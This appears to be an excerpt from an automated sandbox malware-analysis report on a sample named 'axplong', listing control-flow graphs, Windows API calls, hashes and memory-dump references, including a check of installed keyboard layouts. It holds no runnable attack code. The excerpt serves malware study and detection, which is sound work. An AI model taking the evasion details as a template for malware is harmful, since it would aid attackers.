                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 1185cfafaa40104b7aaa1b7d67607b4ea142b12b21663fe9a2d6e5a4e61f50cd
                      • Instruction ID: f0bc6c87dcdcce0029a3b238353fff4536cffce4c6e8e9ea6ba3bea93a5d859c
                      • Opcode Fuzzy Hash: 1185cfafaa40104b7aaa1b7d67607b4ea142b12b21663fe9a2d6e5a4e61f50cd
                      • Instruction Fuzzy Hash: 3BE1AF71900228ABEB24DFA4CC89BDEB779AF04304F5442D9E509A7291DB74AFC4DF91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1013 f27d00-f27d82 call f54020 1017 f27d88-f27db0 call f37870 call f25b20 1013->1017 1018 f2827e-f2829b call f3cf21 1013->1018 1025 f27db2 1017->1025 1026 f27db4-f27dd6 call f37870 call f25b20 1017->1026 1025->1026 1031 f27dda-f27df3 1026->1031 1032 f27dd8 1026->1032 1035 f27e24-f27e4f 1031->1035 1036 f27df5-f27e04 1031->1036 1032->1031 1037 f27e80-f27ea1 1035->1037 1038 f27e51-f27e60 1035->1038 1039 f27e06-f27e14 1036->1039 1040 f27e1a-f27e21 call f3d593 1036->1040 1043 f27ea3-f27ea5 GetNativeSystemInfo 1037->1043 1044 f27ea7-f27eac 1037->1044 1041 f27e62-f27e70 1038->1041 1042 f27e76-f27e7d call f3d593 1038->1042 1039->1040 1045 f2829c call f56b9a 1039->1045 1040->1035 1041->1042 1041->1045 1042->1037 1048 f27ead-f27eb6 1043->1048 1044->1048 1051 f282a1-f282a6 call f56b9a 1045->1051 1054 f27ed4-f27ed7 1048->1054 1055 f27eb8-f27ebf 1048->1055 1059 f2821f-f28222 1054->1059 1060 f27edd-f27ee6 1054->1060 1057 f27ec5-f27ecf 1055->1057 1058 f28279 1055->1058 1065 f28274 1057->1065 1058->1018 1059->1058 1063 f28224-f2822d 1059->1063 1061 f27ee8-f27ef4 1060->1061 1062 f27ef9-f27efc 1060->1062 1061->1065 1066 f27f02-f27f09 1062->1066 1067 f281fc-f281fe 1062->1067 1068 f28254-f28257 1063->1068 1069 f2822f-f28233 1063->1069 1065->1058 1070 f27fe9-f281e5 call f37870 call f25b20 call f37870 call f25b20 call f25c60 call f37870 call f25b20 call f25640 call f37870 call f25b20 call f37870 call f25b20 call f25c60 call f37870 call f25b20 call f25640 call f37870 call f25b20 call f37870 call f25b20 call f25c60 call f37870 call f25b20 call f25640 1066->1070 1071 f27f0f-f27f6b call f37870 call f25b20 call f37870 call f25b20 call f25c60 1066->1071 1076 f28200-f2820a 1067->1076 1077 f2820c-f2820f 1067->1077 1074 f28265-f28271 1068->1074 1075 f28259-f28263 1068->1075 1072 f28235-f2823a 1069->1072 1073 f28248-f28252 1069->1073 1113 f281eb-f281f4 1070->1113 1099 f27f70-f27f77 1071->1099 1072->1073 1079 f2823c-f28246 1072->1079 1073->1058 1074->1065 1075->1058 1076->1065 1077->1058 1081 f28211-f2821d 1077->1081 1079->1058 1081->1065 1101 f27f7b-f27f9b call f58a81 1099->1101 1102 f27f79 1099->1102 1107 f27fd2-f27fd4 1101->1107 1108 f27f9d-f27fac 1101->1108 1102->1101 1112 f27fda-f27fe4 1107->1112 1107->1113 1110 f27fc2-f27fcf call f3d593 1108->1110 1111 f27fae-f27fbc 1108->1111 1110->1107 1111->1051 1111->1110 1112->1113 1113->1059 1117 f281f6 1113->1117 1117->1067
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F27EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: 54279810fccbf79715bcd9186f270b0259bace29d7b6f5405e9c4ed50feb8fb5
                      • Instruction ID: 73f45769666ac24bd370443be280727ca453dda3657c6d4992c8809f7c8b95f5
                      • Opcode Fuzzy Hash: 54279810fccbf79715bcd9186f270b0259bace29d7b6f5405e9c4ed50feb8fb5
                      • Instruction Fuzzy Hash: 3DD11C71E00628DBDF14BB28EC4A3AD7771AB46720F544288E415A73D2DB399E81A7D3

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1151 f56e01-f56e36 GetFileType 1152 f56e3c-f56e47 1151->1152 1153 f56eee-f56ef1 1151->1153 1154 f56e69-f56e85 call f54020 GetFileInformationByHandle 1152->1154 1155 f56e49-f56e5a call f57177 1152->1155 1156 f56ef3-f56ef6 1153->1156 1157 f56f1a-f56f42 1153->1157 1167 f56f0b-f56f18 call f5740d 1154->1167 1172 f56e8b-f56ecd call f570c9 call f56f71 * 3 1154->1172 1169 f56f07-f56f09 1155->1169 1170 f56e60-f56e67 1155->1170 1156->1157 1162 f56ef8-f56efa 1156->1162 1158 f56f44-f56f57 1157->1158 1159 f56f5f-f56f61 1157->1159 1158->1159 1174 f56f59-f56f5c 1158->1174 1164 f56f62-f56f70 call f3cf21 1159->1164 1166 f56efc-f56f01 call f57443 1162->1166 1162->1167 1166->1169 1167->1169 1169->1164 1170->1154 1187 f56ed2-f56eea call f57096 1172->1187 1174->1159 1187->1159 1190 f56eec 1187->1190 1190->1169
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00F56E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00F56E7D
                      • __dosmaperr.LIBCMT ref: 00F56F12
                        • Part of subcall function 00F57177: __dosmaperr.LIBCMT ref: 00F571AC
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 451fb5c0ca57802b5ada8655bcefbd45c4effb99b1686a625aa7d6d61395453a
                      • Instruction ID: 9c8122f6f152d340ab59b2733833a9259cfee6f89693ef21139034f7ff179f94
                      • Opcode Fuzzy Hash: 451fb5c0ca57802b5ada8655bcefbd45c4effb99b1686a625aa7d6d61395453a
                      • Instruction Fuzzy Hash: 0E415E75D00304ABCB24EFB5EC459ABBBF9EF48311B10451DFA66D3611EB34A908EB60

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1313 f5d4f4-f5d515 call f3deb0 1316 f5d517 1313->1316 1317 f5d52f-f5d532 1313->1317 1318 f5d54e-f5d55a call f5a688 1316->1318 1319 f5d519-f5d51f 1316->1319 1317->1318 1320 f5d534-f5d537 1317->1320 1333 f5d564-f5d570 call f5d47e 1318->1333 1334 f5d55c-f5d55f 1318->1334 1321 f5d521-f5d525 1319->1321 1322 f5d543-f5d54c call f5d43c 1319->1322 1320->1322 1323 f5d539-f5d53c 1320->1323 1321->1318 1325 f5d527-f5d52b 1321->1325 1338 f5d58c-f5d595 1322->1338 1326 f5d572-f5d582 call f57443 call f56b8a 1323->1326 1327 f5d53e-f5d541 1323->1327 1325->1326 1330 f5d52d 1325->1330 1326->1334 1327->1322 1327->1326 1330->1322 1333->1326 1343 f5d584-f5d589 1333->1343 1335 f5d6cb-f5d6da 1334->1335 1341 f5d597-f5d59f call f58c8b 1338->1341 1342 f5d5a2-f5d5b3 1338->1342 1341->1342 1346 f5d5b5-f5d5c7 1342->1346 1347 f5d5c9 1342->1347 1343->1338 1348 f5d5cb-f5d5dc 1346->1348 1347->1348 1350 f5d5de-f5d5e0 1348->1350 1351 f5d64a-f5d65a call f5d687 1348->1351 1353 f5d5e6-f5d5e8 1350->1353 1354 f5d6db-f5d6dd 1350->1354 1360 f5d65c-f5d65e 1351->1360 1361 f5d6c9 1351->1361 1356 f5d5f4-f5d600 1353->1356 1357 f5d5ea-f5d5ed 1353->1357 1358 f5d6e7-f5d6fa call f5651d 1354->1358 1359 f5d6df-f5d6e6 call f58cd3 1354->1359 1363 f5d640-f5d648 1356->1363 1364 f5d602-f5d617 call f5d4eb * 2 1356->1364 1357->1356 1362 f5d5ef-f5d5f2 1357->1362 1377 f5d6fc-f5d706 1358->1377 1378 f5d708-f5d70e 1358->1378 1359->1358 1367 f5d660-f5d676 call f5a531 1360->1367 1368 f5d699-f5d6a2 1360->1368 1361->1335 1362->1356 1369 f5d61a-f5d61c 1362->1369 1363->1351 1364->1369 1392 f5d6a5-f5d6a8 1367->1392 1368->1392 1369->1363 1375 f5d61e-f5d62e 1369->1375 1382 f5d630-f5d635 1375->1382 1377->1378 1383 f5d73c-f5d747 call f57443 1377->1383 1384 f5d727-f5d738 RtlAllocateHeap 1378->1384 1385 f5d710-f5d711 1378->1385 1382->1351 1387 f5d637-f5d63e 1382->1387 1396 f5d749-f5d74b 1383->1396 1389 f5d713-f5d71a call f59c81 1384->1389 1390 f5d73a 1384->1390 1385->1384 1387->1382 1389->1383 1403 f5d71c-f5d725 call f58cf9 1389->1403 1390->1396 1393 f5d6b4-f5d6bc 1392->1393 1394 f5d6aa-f5d6ad 1392->1394 1393->1361 1399 f5d6be-f5d6c6 call f5a531 1393->1399 1394->1393 1398 f5d6af-f5d6b2 1394->1398 1398->1361 1398->1393 1399->1361 1403->1383 1403->1384
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7380882f10e659e598bc72e740310152b40d0d5d8fd9e896302a0117f11f3a6b
                      • Instruction ID: 2bfc555d832f33ecabb7d7d7a3e112210ecd2176c6b6160d8f93a049b9d153a6
                      • Opcode Fuzzy Hash: 7380882f10e659e598bc72e740310152b40d0d5d8fd9e896302a0117f11f3a6b
                      • Instruction Fuzzy Hash: C1611572D026148FDF35EFA8D8857EDB7A0EF45327F284116DE48AB250E6309C49EB51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1407 f282b0-f28331 call f54020 1411 f28333-f28338 1407->1411 1412 f2833d-f28365 call f37870 call f25b20 1407->1412 1413 f2847f-f2849b call f3cf21 1411->1413 1420 f28367 1412->1420 1421 f28369-f2838b call f37870 call f25b20 1412->1421 1420->1421 1426 f2838f-f283a8 1421->1426 1427 f2838d 1421->1427 1430 f283aa-f283b9 1426->1430 1431 f283d9-f28404 1426->1431 1427->1426 1432 f283bb-f283c9 1430->1432 1433 f283cf-f283d6 call f3d593 1430->1433 1434 f28431-f28452 1431->1434 1435 f28406-f28415 1431->1435 1432->1433 1438 f2849c-f284a1 call f56b9a 1432->1438 1433->1431 1436 f28454-f28456 GetNativeSystemInfo 1434->1436 1437 f28458-f2845d 1434->1437 1440 f28427-f2842e call f3d593 1435->1440 1441 f28417-f28425 1435->1441 1442 f2845e-f28465 1436->1442 1437->1442 1440->1434 1441->1438 1441->1440 1442->1413 1447 f28467-f2846f 1442->1447 1450 f28471-f28476 1447->1450 1451 f28478-f2847b 1447->1451 1450->1413 1451->1413 1452 f2847d 1451->1452 1452->1413
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00F28454
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: fbc4c7caa470af820d57ad85e4e3935d8db93275d7b137e8fa671d5653c47d11
                      • Instruction ID: ed1d2de3c94e95f8aba27f05d4c51b77c2fd91fd8d9e125adabd6eb2e086fdd9
                      • Opcode Fuzzy Hash: fbc4c7caa470af820d57ad85e4e3935d8db93275d7b137e8fa671d5653c47d11
                      • Instruction Fuzzy Hash: 94515971D01228DBEB24FB78EC497EDB775DB45350F5042A8E804A72C1EF359E809B91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1453 f56c99-f56ca5 1454 f56cc4-f56ce8 call f54020 1453->1454 1455 f56ca7-f56cc3 call f57430 call f57443 call f56b8a 1453->1455 1460 f56d06-f56d28 CreateFileW 1454->1460 1461 f56cea-f56d04 call f57430 call f57443 call f56b8a 1454->1461 1464 f56d38-f56d3f call f56d77 1460->1464 1465 f56d2a-f56d2e call f56e01 1460->1465 1485 f56d72-f56d76 1461->1485 1475 f56d40-f56d42 1464->1475 1474 f56d33-f56d36 1465->1474 1474->1475 1477 f56d64-f56d67 1475->1477 1478 f56d44-f56d61 call f54020 1475->1478 1481 f56d70 1477->1481 1482 f56d69-f56d6f 1477->1482 1478->1477 1481->1485 1482->1481
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 45c491bcc6c866dfb7e6eaf4a0dd80ac800bbd90a791334413f28d45262d3700
                      • Instruction ID: 599bcf94552f23389560cecee4162a0536967f159acbc6537b85ed28e56153bc
                      • Opcode Fuzzy Hash: 45c491bcc6c866dfb7e6eaf4a0dd80ac800bbd90a791334413f28d45262d3700
                      • Instruction Fuzzy Hash: 0C212B72A05608BAEB11BB649C42BAF37399F4133AF600710FF346B1D1DB745D09A6A1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1487 f56f71-f56f87 1488 f56f97-f56fa7 1487->1488 1489 f56f89-f56f8d 1487->1489 1493 f56fe7-f56fea 1488->1493 1494 f56fa9-f56fbb SystemTimeToTzSpecificLocalTime 1488->1494 1489->1488 1490 f56f8f-f56f95 1489->1490 1491 f56fec-f56ff7 call f3cf21 1490->1491 1493->1491 1494->1493 1496 f56fbd-f56fdd call f56ff8 1494->1496 1499 f56fe2-f56fe5 1496->1499 1499->1491
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00F56FB3
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 986171aa4ee47ae5848b687d7cc5a3dd5f16263c85043615bec7b29281919a3f
                      • Instruction ID: cdd19275eb18c20e5fd213c5960e56de4842c654e24a529cf567dd4e5d8a6f5f
                      • Opcode Fuzzy Hash: 986171aa4ee47ae5848b687d7cc5a3dd5f16263c85043615bec7b29281919a3f
                      • Instruction Fuzzy Hash: 2011EF72D0020CAADB10DE95D945EDFB7FCAB48321F505666FA21E7180E734EB48DBA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1500 f5d6ef-f5d6fa 1501 f5d6fc-f5d706 1500->1501 1502 f5d708-f5d70e 1500->1502 1501->1502 1503 f5d73c-f5d747 call f57443 1501->1503 1504 f5d727-f5d738 RtlAllocateHeap 1502->1504 1505 f5d710-f5d711 1502->1505 1510 f5d749-f5d74b 1503->1510 1507 f5d713-f5d71a call f59c81 1504->1507 1508 f5d73a 1504->1508 1505->1504 1507->1503 1513 f5d71c-f5d725 call f58cf9 1507->1513 1508->1510 1513->1503 1513->1504
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00F5A5ED,?,00F574AE,?,00000000,?), ref: 00F5D731
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 07e653f8b48192670dc50b339b28413586c74f4a3795820f0d2440413a340ebc
                      • Instruction ID: d2da2a83c449c72a11e59739db574088108843064a5e7ed63fbb306b6801ba21
                      • Opcode Fuzzy Hash: 07e653f8b48192670dc50b339b28413586c74f4a3795820f0d2440413a340ebc
                      • Instruction Fuzzy Hash: F9F0E932D07625A69B317A227D05B5B3B89DF897B3B194111AE04EA181CB24D80977E0

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 221692a975f0e3eeb0ad0f02b51b13b06d200c3e54aa3e7a9335d8b552428f3f
                      • Instruction ID: f749f31dff97c474f88a02e83e49c24f97cd161cc736962fa53c457b9bac215f
                      • Opcode Fuzzy Hash: 221692a975f0e3eeb0ad0f02b51b13b06d200c3e54aa3e7a9335d8b552428f3f
                      • Instruction Fuzzy Hash: CAF0A971E40618ABC710BB689D0775DBB75AB46B70F900358E811672E1DB34A90067D3
                      Memory Dump Source
                      • Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5200000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 88ca714364c6e1b261efb956ddf7814f4dbedb7835cd3b31860423ec4affb691
                      • Instruction ID: 7abcdefac443a8935a45d2ecd94e26278fa74ff09a48fd14f2edf1c8f27f5ee5
